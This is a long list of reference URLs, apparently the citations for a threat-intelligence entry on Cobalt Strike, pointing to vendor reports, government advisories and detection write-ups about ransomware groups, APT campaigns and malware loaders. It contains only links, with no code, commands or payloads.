- "https://www.cybereason.com/blog/threat-analysis-report-from-shatak-emails-to-the-conti-ransomware",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/harvester-new-apt-attacks-asia",
- "https://www.mandiant.com/media/10916/download",
- "https://www.sentinelone.com/blog/bluesky-ransomware-ad-lateral-movement-evasion-and-fast-encryption-puts-threat-on-the-radar/",
- "https://www.advintel.io/post/enter-karakurt-data-extortion-arm-of-prolific-ransomware-group",
- "https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c",
- "https://www.accenture.com/us-en/blogs/cyber-defense/moving-left-ransomware-boom",
- "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
- "https://ics-cert.kaspersky.com/publications/reports/2022/06/27/attacks-on-industrial-control-systems-using-shadowpad/",
- "https://twitter.com/elisalem9/status/1398566939656601606",
- "https://blog.cyble.com/2022/09/07/bumblebee-returns-with-new-infection-technique/",
- "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-solarwinds-serv-u-exploit-campaign/",
- "https://svch0st.medium.com/guide-to-named-pipes-and-hunting-for-cobalt-strike-pipes-dc46b2c5f575",
- "https://www.microsoft.com/security/blog/2021/07/29/bazacall-phony-call-centers-lead-to-exfiltration-and-ransomware/",
- "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-ml-and-kql-part-2-bff46cfc1e7e",
- "https://www.silentpush.com/blog/consequences-the-conti-leaks-and-future-problems",
- "https://malware-traffic-analysis.net/2021/09/29/index.html",
- "https://www.secureworks.com/research/threat-profiles/bronze-president",
- "https://github.com/JPCERTCC/aa-tools/blob/master/cobaltstrikescan.py",
- "https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware",
- "https://www.recordedfuture.com/solardeflection-c2-infrastructure-used-by-nobelium-in-company-brand-misuse/",
- "https://blog.morphisec.com/vmware-identity-manager-attack-backdoor",
- "https://twitter.com/vikas891/status/1385306823662587905",
- "https://redcanary.com/blog/grief-ransomware/",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Tseng-Mem2Img-Memory-Resident-Malware-Detection-via-Convolution-Neural-Network.pdf",
- "https://blog.nviso.eu/2021/10/21/cobalt-strike-using-known-private-keys-to-decrypt-traffic-part-1/",
- "https://jsac.jpcert.or.jp/archive/2022/pdf/JSAC2022_9_yanagishita-tamada-nakatsuru-ishimaru_en.pdf",
- "https://www.advintel.io/post/24-hours-from-log4shell-to-local-admin-deep-dive-into-conti-gang-attack-on-fortune-500-dfir",
- "https://www.wired.com/story/russias-fancy-bear-hack-us-federal-agency/",
- "https://michaelkoczwara.medium.com/cobalt-strike-hunting-simple-pcap-and-beacon-analysis-f51c36ce6811",
- "https://cert.gov.ua/article/703548",
- "https://www.npu.gov.ua/news/kiberzlochini/kiberpolicziya-vikrila-xakerske-ugrupovannya-u-rozpovsyudzhenni-virusu-shifruvalnika-ta-nanesenni-inozemnim-kompaniyam-piv-milyarda-dolariv-zbitkiv/",
- "https://cluster25.io/2022/05/03/a-strange-link-between-a-destructive-malware-and-the-loader-of-a-ransomware-group-isaacwiper-vs-vatet/",
- "https://blog.malwarebytes.com/threat-analysis/2020/07/chinese-apt-group-targets-india-and-hong-kong-using-new-variant-of-mgbot-malware/",
- "https://github.com/Sentinel-One/CobaltStrikeParser/blob/master/parse_beacon_config.py",
- "https://asec.ahnlab.com/en/34549/",
- "https://www.ironnet.com/blog/tracking-cobalt-strike-servers-used-in-cyberattacks-on-ukraine",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-14cc543af811",
- "https://security.macnica.co.jp/blog/2022/05/iso.html",
- "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/",
- "https://www.mandiant.com/resources/blog/phished-at-the-request-of-counsel",
- "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515",
- "https://pkb1s.github.io/Relay-attacks-via-Cobalt-Strike-beacons/",
- "https://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/",
- "https://www.malware-traffic-analysis.net/2021/09/17/index.html",
- "https://twitter.com/GossiTheDog/status/1438500100238577670",
- "https://www.proofpoint.com/us/blog/threat-insight/nimzaloader-ta800s-new-initial-access-malware",
- "https://blog.group-ib.com/colunmtk_apt41",
- "https://news.sophos.com/en-us/2022/01/19/zloader-installs-remote-access-backdoors-and-delivers-cobalt-strike/",
- "https://www.ncsc.gov.ie/pdfs/HSE_Conti_140521_UPDATE.pdf",
- "https://news.sophos.com/en-us/2021/05/05/intervention-halts-a-proxylogon-enabled-attack",
- "https://www.cynet.com/orion-threat-alert-flight-of-the-bumblebee/",
- "https://www.wired.com/story/chinese-hackers-taiwan-semiconductor-industry-skeleton-key/",
- "https://blog.fox-it.com/2019/02/26/identifying-cobalt-strike-team-servers-in-the-wild/",
- "https://www.infinitumit.com.tr/en/conti-ransomware-group-behind-the-karakurt-hacking-team/",
- "https://blog.sonatype.com/new-pymafka-malicious-package-drops-cobalt-strike-on-macos-windows-linux",
- "https://grimminck.medium.com/spoofing-jarm-signatures-i-am-the-cobalt-strike-server-now-a27bd549fc6b",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-1",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations-wp.pdf",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-148a",
- "https://medium.com/walmartglobaltech/socgholish-campaigns-and-initial-access-kit-4c4283fea8ee",
- "https://www.guidepointsecurity.com/blog/a-ransomware-near-miss-proxyshell-a-rat-and-cobalt-strike/",
- "https://unit42.paloaltonetworks.com/cloaked-ursa-online-storage-services-campaigns/",
- "https://blog.nviso.eu/2021/11/17/cobalt-strike-decrypting-obfuscated-traffic-part-4/",
- "https://www.macnica.net/file/mpression_automobile.pdf",
- "https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/",
- "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks",
- "https://talos-intelligence-site.s3.amazonaws.com/production/document_files/files/000/095/031/original/Talos_Cobalt_Strike.pdf",
- "https://asec.ahnlab.com/ko/19860/",
- "https://www.welivesecurity.com/2022/04/13/eset-takes-part-global-operation-disrupt-zloader-botnets/",
- "https://www.trendmicro.com/vinfo/us/security/news/cyber-attacks/operation-drbcontrol-uncovering-a-cyberespionage-campaign-targeting-gambling-companies-in-southeast-asia",
- "https://www.sekoia.io/en/nobeliums-envyscout-infection-chain-goes-in-the-registry-targeting-embassies/",
- "https://www.secureworks.com/blog/hades-ransomware-operators-use-distinctive-tactics-and-infrastructure",
- "https://www.crowdstrike.com/blog/how-falcon-complete-disrupts-ecrime-operators-wizard-spider/",
- "https://5851803.fs1.hubspotusercontent-na1.net/hubfs/5851803/Russian%20Ransomware%20C2%20Network%20Discovered%20in%20Censys%20Data.pdf",
- "https://www.deepinstinct.com/2021/03/18/cobalt-strike-post-exploitation-attackers-toolkit/",
- "https://www.zscaler.com/blogs/research/targeted-attack-leverages-india-china-border-dispute-lure-victims",
- "https://www.volexity.com/blog/2021/05/27/suspected-apt29-operation-launches-election-fraud-themed-phishing-campaigns/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/diving-deeper-into-the-kaseya-vsa-attack-revil-returns-and-other-hackers-are-riding-their-coattails/",
- "https://blog.morphisec.com/log4j-exploit-targets-vulnerable-unifi-network-applications",
- "https://www.accenture.com/us-en/blogs/security/ransomware-hades",
- "https://www.fireeye.com/blog/threat-research/2021/06/darkside-affiliate-supply-chain-software-compromise.html",
- "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf",
- "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/",
- "https://www.cobaltstrike.com/support",
- "https://thedfirreport.com/2021/11/01/from-zero-to-domain-admin/",
- "https://www.microsoft.com/security/blog/2022/04/13/dismantling-zloader-how-malicious-ads-led-to-disabled-security-tools-and-ransomware/",
- "https://cert.ssi.gouv.fr/uploads/20220427_NP_TLPWHITE_ANSSI_FIN7.pdf",
- "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/",
- "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/",
- "https://awakesecurity.com/blog/detecting-icedid-and-cobalt-strike-beacon-with-network-detection-and-response/",
- "https://www.sekoia.io/en/an-insider-insights-into-conti-operations-part-one",
- "https://attackiq.com/2022/06/03/attack-graph-response-to-us-cert-aa22-152a-karakurt-data-extortion-group/",
- "https://www.telsy.com/legitimate-sites-used-as-cobalt-strike-c2s-against-indian-government/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://www.picussecurity.com/resource/blog/ttps-used-in-the-solarwinds-breach",
- "https://isc.sans.edu/diary/rss/27618",
- "https://www.trendmicro.com/en_us/research/21/i/remote-code-execution-zero-day--cve-2021-40444--hits-windows--tr.html",
- "https://mp.weixin.qq.com/s/cGS8FocPnUdBconLbbaG-g",
- "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a",
"https://securelist.com/apt-trends-report-q2-2020/97937/",
- "https://twitter.com/alex_lanstein/status/1399829754887524354",
- "https://isc.sans.edu/diary/rss/27176",
- "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass",
- "https://twitter.com/Cryptolaemus1/status/1407135648528711680",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2019/presentations/cds19-executive-s08-achievement-unlocked.pdf",
- "https://twitter.com/RedDrip7/status/1402640362972147717?s=20",
- "https://securelist.com/apt-luminousmoth/103332/",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf",
- "https://www.esentire.com/blog/increase-in-emotet-activity-and-cobalt-strike-deployment",
- "https://www.trustnet.co.il/blog/virus-alert-to-powershell-encrypted-loader/",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war",
- "https://videos.didierstevens.com/2022/09/06/an-obfuscated-beacon-extra-xor-layer/",
- "https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/",
- "https://www.bitdefender.com/files/News/CaseStudies/study/262/Bitdefender-WhitePaper-An-APT-Blueprint-Gaining-New-Visibility-into-Financial-Threats-interactive.pdf",
- "https://www.crowdstrike.com/blog/getting-the-bacon-from-cobalt-strike-beacon/",
- "https://www.microsoft.com/security/blog/2020/11/30/threat-actor-leverages-coin-miner-techniques-to-stay-under-the-radar-heres-how-to-spot-them/",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-148a",
- "https://www.youtube.com/watch?v=ysN-MqyIN7M",
- "https://www.bleepingcomputer.com/news/security/vulnerable-microsoft-sql-servers-targeted-with-cobalt-strike/",
- "https://securityintelligence.com/posts/trickbot-group-systematically-attacking-ukraine",
- "https://blog.gigamon.com/2021/09/10/rendering-threats-a-network-perspective/",
- "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/",
- "https://www.microsoft.com/security/blog/2021/09/15/analyzing-attacks-that-exploit-the-mshtml-cve-2021-40444-vulnerability/",
- "https://www.advanced-intel.com/post/secret-backdoor-behind-conti-ransomware-operation-introducing-atera-agent",
- "https://www.fireeye.com/blog/threat-research/2018/11/not-so-cozy-an-uncomfortable-examination-of-a-suspected-apt29-phishing-campaign.html",
- "https://news.sophos.com/en-us/2022/08/18/cookie-stealing-the-new-perimeter-bypass",
- "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2021-CTI-009.pdf",
- "https://www.unh4ck.com/detection-engineering-and-threat-hunting/lateral-movement/detecting-conti-cobaltstrike-lateral-movement-techniques-part-2",
- "https://unit42.paloaltonetworks.com/fireeye-solarstorm-sunburst/",
- "https://isc.sans.edu/diary/rss/26862",
- "https://unit42.paloaltonetworks.com/cobalt-strike-metadata-encryption-decryption/",
- "https://www.cybereason.com/blog/threat-analysis-report-datoploader-exploits-proxyshell-to-deliver-qbot-and-cobalt-strike",
- "https://blog.nviso.eu/2021/04/26/anatomy-of-cobalt-strike-dll-stagers/",
- "https://www.mcafee.com/enterprise/en-us/assets/reports/rp-operation-dianxun.pdf",
- "https://www.secureworks.com/blog/detecting-cobalt-strike-government-sponsored-threat-groups",
- "https://elis531989.medium.com/the-squirrel-strikes-back-analysis-of-the-newly-emerged-cobalt-strike-loader-squirrelwaffle-937b73dbd9f9",
- "https://boschko.ca/cobalt-strike-process-injection/",
- "https://www.splunk.com/en_us/blog/security/cloud-federated-credential-abuse-cobalt-strike-threat-research-feb-2021.html",
- "https://www.recordedfuture.com/chinese-group-tag-22-targets-nepal-philippines-taiwan",
- "https://i.blackhat.com/USA-20/Thursday/us-20-Chen-Operation-Chimera-APT-Operation-Targets-Semiconductor-Vendors.pdf",
- "https://blog.bushidotoken.net/2022/06/overview-of-russian-gru-and-svr.html",
- "https://www.proofpoint.com/us/blog/threat-insight/cobalt-strike-favorite-tool-apt-crimeware",
- "https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments",
- "https://lab52.io/blog/the-energy-reserves-in-the-eastern-mediterranean-sea-and-a-malicious-campaign-of-apt10-against-turkey/",
- "https://michaelkoczwara.medium.com/cobalt-strike-powershell-payload-analysis-eecf74b3c2f7",
- "https://thedfirreport.com/2021/06/28/hancitor-continues-to-push-cobalt-strike/",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
- "https://blueteamblog.com/darkside-ransomware-operations-preventions-and-detections",
- "https://www.blackhillsinfosec.com/dns-over-https-for-cobalt-strike/",
- "https://www.crowdstrike.com/blog/overwatch-exposes-aquatic-panda-in-possession-of-log-4-shell-exploit-tools/",
- "https://labs.f-secure.com/blog/detecting-cobalt-strike-default-modules-via-named-pipe-analysis",
- "https://www.telsy.com/download/5972/?uid=d7c082ba55",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbasta",
- "https://forensicitguy.github.io/inspecting-powershell-cobalt-strike-beacon/",
- "https://isc.sans.edu/diary/27308",
- "https://www.huntress.com/blog/cobalt-strike-analysis-of-obfuscated-malware",
- "https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis",
- "https://unit42.paloaltonetworks.com/cobalt-strike-malleable-c2-profile/",
- "http://blog.nsfocus.net/murenshark",
- "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/",
- "https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-ransomexx",
- "https://www.cybereason.com/blog/cybereason-vs-egregor-ransomware",
- "https://www.secureworks.com/research/threat-profiles/gold-kingswood",
- "https://www.carbonblack.com/2020/03/26/the-dukes-of-moscow/",
- "https://research.checkpoint.com/2019/rancor-the-year-of-the-phish/",
- "https://thehackernews.com/2022/05/malware-analysis-trickbot.html",
- "https://www.cynet.com/attack-techniques-hands-on/quakbot-strikes-with-quaknightmare-exploitation/",
- "https://awakesecurity.com/blog/catching-the-white-stork-in-flight/",
- "https://blog.talosintelligence.com/2021/10/squirrelwaffle-emerges.html",
- "https://pylos.co/2018/11/18/cozybear-in-from-the-cold/",
- "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf",
- "https://www.youtube.com/watch?v=FC9ARZIZglI",
- "https://thedfirreport.com/2021/05/02/trickbot-brief-creds-and-beacons/",
- "https://ak100117.medium.com/analyzing-cobalt-strike-powershell-payload-64d55ed3521b",
- "https://www.aon.com/cyber-solutions/aon_cyber_labs/cobalt-strike-configuration-extractor-and-parser/",
- "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/",
- "https://enterprise.verizon.com/resources/reports/2019-data-breach-investigations-report.pdf",
- "https://www.0ffset.net/reverse-engineering/malware-analysis/squirrelwaffle-custom-packer/",
- "https://socfortress.medium.com/detecting-cobalt-strike-beacons-3f8c9fdcb654",
- "https://www.cisa.gov/uscert/ncas/alerts/aa22-249a",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/sneak-peek-ch1-2-finding-beacons-in-the-dark.pdf",
- "https://blog.group-ib.com/REvil_RaaS",
- "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf",
- "https://isc.sans.edu/diary/rss/28752",
- "https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-annex-download.pdf",
- "https://mp.weixin.qq.com/s/xPsEXp2J5IE7wNSMEVC24A",
- "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/overview-of-the-cyber-weapons-used-in-the-ukraine-russia-war/",
- "https://www.accenture.com/us-en/blogs/cyber-defense/double-extortion-campaigns",
- "https://blog.malwarebytes.com/threat-analysis/2020/06/multi-stage-apt-attack-drops-cobalt-strike-using-malleable-c2-feature/",
- "https://github.com/Apr4h/CobaltStrikeScan",
- "https://research.nccgroup.com/2020/06/23/wastedlocker-a-new-ransomware-variant-developed-by-the-evil-corp-group/",
- "https://thedfirreport.com/2021/01/31/bazar-no-ryuk/",
- "https://www.advanced-intel.com/post/hunting-for-corporate-insurance-policies-indicators-of-ransom-exfiltrations",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/locked-loaded-and-in-the-wrong-hands-legitimate-tools-weaponized-for-ransomware-in-2021",
- "https://www.youtube.com/watch?v=WW0_TgWT2gs",
- "https://www.trendmicro.com/en_us/research/21/e/proxylogon-a-coinminer--a-ransomware--and-a-botnet-join-the-part.html",
- "https://www.mandiant.com/resources/spear-phish-ukrainian-entities",
- "https://github.com/0xjxd/SquirrelWaffle-From-Maldoc-to-Cobalt-Strike/raw/main/2021-10-02%20-%20SquirrelWaffle%20-%20From%20Maldoc%20to%20Cobalt%20Strike.pdf",
- "https://blog.reversinglabs.com/blog/threat-analysis-follina-exploit-powers-live-off-the-land-attacks",
- "https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/",
- "https://www.brighttalk.com/webcast/7451/462719",
- "https://community.riskiq.com/article/f0320980",
- "https://blog.nviso.eu/2022/07/20/analysis-of-a-trojanized-jquery-script-gootloader-unleashed/",
- "https://research.nccgroup.com/2020/06/15/striking-back-at-retired-cobalt-strike-a-look-at-a-legacy-vulnerability/",
- "https://401trg.com/burning-umbrella/ ",
- "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/",
- "https://news.sophos.com/en-us/2021/09/03/conti-affiliates-use-proxyshell-exchange-exploit-in-ransomware-attacks/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2",
- "https://www.secureworks.com/blog/detecting-cobalt-strike-cybercrime-attacks",
- "https://www.youtube.com/watch?v=borfuQGrB8g",
- "https://www.trendmicro.com/en_us/research/22/c/cyberattacks-are-prominent-in-the-russia-ukraine-conflict.html",
- "https://asec.ahnlab.com/ko/19640/",
- "https://www.mandiant.com/resources/sabbath-ransomware-affiliate",
- "https://r136a1.info/2022/05/25/introduction-of-a-pe-file-extractor-for-various-situations/",
- "https://blog.cyble.com/2022/06/23/matanbuchus-loader-resurfaces/",
- "https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s05-att&cking-fin7.pdf",
- "https://thedfirreport.com/2020/08/31/netwalker-ransomware-in-1-hour/",
- "https://isc.sans.edu/forums/diary/Qakbot+infection+with+Cobalt+Strike+and+VNC+activity/28448/",
- "https://svch0st.medium.com/stats-from-hunting-cobalt-strike-beacons-c17e56255f9b",
- "https://www.bleepingcomputer.com/news/security/cisa-updates-conti-ransomware-alert-with-nearly-100-domain-names/",
- "https://sixdub.medium.com/using-kaitai-to-parse-cobalt-strike-beacon-configs-f5f0552d5a6e",
- "https://www.cynet.com/attack-techniques-hands-on/new-wave-of-emotet-when-project-x-turns-into-y/",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/growling-bears-make-thunderous-noise.html",
- "https://blog.google/threat-analysis-group/initial-access-broker-repurposing-techniques-in-targeted-attacks-against-ukraine/",
- "https://twitter.com/ffforward/status/1324281530026524672",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0503.pdf",
- "https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html",
- "https://blog.malwarebytes.com/threat-intelligence/2022/07/cobalt-strikes-again-uac-0056-continues-to-target-ukraine-in-its-latest-campaign/",
- "https://rastamouse.me/ntlm-relaying-via-cobalt-strike/",
- "https://blog.talosintelligence.com/2022/08/manjusaka-offensive-framework.html",
- "https://www.advintel.io/post/backup-removal-solutions-from-conti-ransomware-with-love",
- "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/",
- "https://twitter.com/felixw3000/status/1521816045769662468",
- "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack",
- "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/",
- "https://twitter.com/cglyer/status/1480742363991580674",
- "https://blog.viettelcybersecurity.com/apt32-deobfuscation-arsenal-deobfuscating-mot-vai-loai-obfucation-toolkit-cua-apt32-phan-2/",
- "https://www.mandiant.com/resources/unc2452-merged-into-apt29",
- "https://twitter.com/TheDFIRReport/status/1359669513520873473",
- "https://www.fintechsecurity.com.hk/slides/01.Dmitry-Annual-Group-IB-report-High-Tech-Crime-Trends.pdf",
- "https://medium.com/walmartglobaltech/investigation-into-the-state-of-nim-malware-part-2-a28bffffa671",
- "https://www.advintel.io/post/anatomy-of-attack-truth-behind-the-costa-rica-government-ransomware-5-day-intrusion",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
- "https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus",
- "https://www.youtube.com/watch?v=6SDdUVejR2w",
- "https://unit42.paloaltonetworks.com/atoms/obscureserpens/",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://www.volexity.com/blog/2020/11/06/oceanlotus-extending-cyber-espionage-operations-through-fake-websites/",
- "https://cert.gov.ua/article/619229",
- "https://blog.netlab.360.com/blackrota-an-obfuscated-backdoor-written-in-go/",
- "https://www.mandiant.com/resources/evolution-of-fin7",
- "http://www.secureworks.com/research/threat-profiles/gold-drake",
- "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/",
- "https://github.com/sophos-cybersecurity/solarwinds-threathunt",
- "https://morphuslabs.com/attackers-are-abusing-msbuild-to-evade-defenses-and-implant-cobalt-strike-beacons-edac4ab84f42",
"https://www.mcafee.com/blogs/other-blogs/mcafee-labs/csi-evidence-indicators-for-targeted-ransomware-attacks-part-ii/",
- "https://www.secureworks.com/research/threat-profiles/gold-waterfall",
- "https://www.trendmicro.com/en_us/research/22/f/black-basta-ransomware-operators-expand-their-attack-arsenal-wit.html",
- "https://www.prevailion.com/what-wicked-webs-we-unweave/",
- "https://bmcder.com/blog/extracting-cobalt-strike-from-windows-error-reporting",
- "https://www.guidepointsecurity.com/yet-another-cobalt-strike-loader-guid-edition/",
- "https://binary.ninja/2022/07/22/reverse-engineering-cobalt-strike.html",
- "https://mergene.medium.com/enterprise-scale-threat-hunting-network-beacon-detection-with-unsupervised-machine-learning-and-277c4c30304f",
- "https://news.sophos.com/en-us/2022/02/23/dridex-bots-deliver-entropy-ransomware-in-recent-attacks/",
- "https://www.netskope.com/blog/squirrelwaffle-new-malware-loader-delivering-cobalt-strike-and-qakbot",
- "https://attack.mitre.org/groups/G0096",
- "https://blog.talosintelligence.com/2021/11/attackers-use-domain-fronting-technique.html",
- "https://blogs.jpcert.or.jp/en/2018/08/volatility-plugin-for-detecting-cobalt-strike-beacon.html",
- "https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/",
- "https://blogs.blackberry.com/en/2021/10/drawing-a-dragon-connecting-the-dots-to-find-apt41",
- "https://www.inky.com/blog/colonial-pipeline-ransomware-hack-unleashes-flood-of-related-phishing-attempts",
- "https://www.mandiant.com/resources/russian-targeting-gov-business",
- "https://cip.gov.ua/en/news/khto-stoyit-za-kiberatakami-na-ukrayinsku-kritichnu-informaciinu-infrastrukturu-statistika-15-22-bereznya",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/543/original/CTIR_casestudy_1.pdf",
- "https://www.secureworks.com/research/threat-profiles/gold-dupont",
- "https://www.mandiant.com/resources/tracking-apt29-phishing-campaigns",
- "https://www.secureworks.com/research/threat-profiles/gold-niagara",
- "https://threatpost.com/conti-ransomware-v-3-including-decryptor-leaked/179006/",
- "https://blog.cobaltstrike.com/2020/12/08/a-red-teamer-plays-with-jarm/",
- "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html",
- "https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.trustedsec.com/blog/tailoring-cobalt-strike-on-target/",
- "https://www.pentestpartners.com/security-blog/cobalt-strike-walkthrough-for-red-teamers/",
- "https://www.truesec.com/hub/blog/proxyshell-qbot-and-conti-ransomware-combined-in-a-series-of-cyber-attacks",
- "https://www.bleepingcomputer.com/news/security/emotet-now-drops-cobalt-strike-fast-forwards-ransomware-attacks/",
- "https://norfolkinfosec.com/jeshell-an-oceanlotus-apt32-backdoor/",
- "https://intel471.com/blog/shipping-companies-ransomware-credentials",
- "https://content.fireeye.com/m-trends/rpt-m-trends-2020",
- "https://www.huntress.com/blog/hackers-no-hashing-randomizing-api-hashes-to-evade-cobalt-strike-shellcode-detection",
- "https://nsfocusglobal.com/insights-into-ransomware-spread-using-exchange-1-day-vulnerabilities-1-2/",
- "https://cybersecurity.att.com/blogs/security-essentials/stories-from-the-soc-powershell-proxyshell-conti-ttps-oh-my",
- "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/China/APT/Chimera/Analysis.md",
- "https://www.cynet.com/attack-techniques-hands-on/threats-looming-over-the-horizon/",
- "https://www.sentinelone.com/blog/threat-actor-uac-0056-targeting-ukraine-with-fake-translation-software/",
- "https://isc.sans.edu/diary/26752",
- "https://securelist.com/a-new-secret-stash-for-fileless-malware/106393/",
- "https://cybleinc.com/2020/11/17/oceanlotus-continues-with-its-cyber-espionage-operations/",
- "https://mez0.cc/posts/cobaltstrike-powershell-exec/",
- "https://www.mandiant.com/resources/unc2165-shifts-to-evade-sanctions",
- "https://blog.didierstevens.com/2021/11/03/new-tool-cs-extract-key-py/",
- "https://twitter.com/AltShiftPrtScn/status/1350755169965924352",
- "https://github.com/ThreatConnect-Inc/research-team/blob/master/IOCs/WizardSpider-UNC1878-Ryuk.csv",
- "https://decoded.avast.io/luigicamastra/backdoored-client-from-mongolian-ca-monpass/",
- "https://medium.com/walmartglobaltech/cobaltstrike-stager-utilizing-floating-point-math-9bc13f9b9718",
- "https://blog.talosintelligence.com/2020/02/building-bypass-with-msbuild.html",
- "https://twitter.com/swisscom_csirt/status/1354052879158571008",
- "https://i.blackhat.com/eu-20/Wednesday/eu-20-Clarke-Its-Not-FINished-The-Evolving-Maturity-In-Ransomware-Operations.pdf",
- "https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf",
- "https://research.nccgroup.com/2022/03/31/conti-nuation-methods-and-techniques-observed-in-operations-post-the-leaks/",
- "https://www.youtube.com/watch?v=C733AyPzkoc",
- "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos",
- "https://github.com/AmnestyTech/investigations/tree/master/2021-02-24_vietnam",
- "https://mal-eats.net/2021/05/10/campo_new_attack_campaign_targeting_japan/",
- "https://blog.macnica.net/blog/2020/11/dtrack.html",
- "https://twitter.com/Unit42_Intel/status/1458113934024757256",
- "https://blog.truesec.com/2020/12/22/collaboration-between-fin7-and-the-ryuk-group-a-truesec-investigation/",
- "https://blog.malwarebytes.com/threat-intelligence/2022/03/new-spear-phishing-campaign-targets-russian-dissidents/",
- "https://medium.com/walmartglobaltech/nimar-loader-4f61c090c49e",
- "https://quake.360.cn/quake/#/reportDetail?id=5fc6fedd191038c3b25c4950",
- "https://go.recordedfuture.com/hubfs/reports/cta-2022-0118.pdf",
- "https://dansec.medium.com/detecting-malicious-c2-activity-spawnas-smb-lateral-movement-in-cobaltstrike-9d518e68b64",
- "https://blogs.blackberry.com/en/2022/01/log4u-shell4me",
- "https://s3.amazonaws.com/talos-intelligence-site/production/document_files/files/000/095/542/original/CTIR_casestudy_2.pdf",
- "https://news.sophos.com/en-us/2021/05/07/new-lemon-duck-variants-exploiting-microsoft-exchange-server/?cmp=30728",
- "https://www.cybereason.com/blog/threat-analysis-report-bumblebee-loader-the-high-road-to-enterprise-domain-control",
- "https://thedfirreport.com/2022/01/24/cobalt-strike-a-defenders-guide-part-2/",
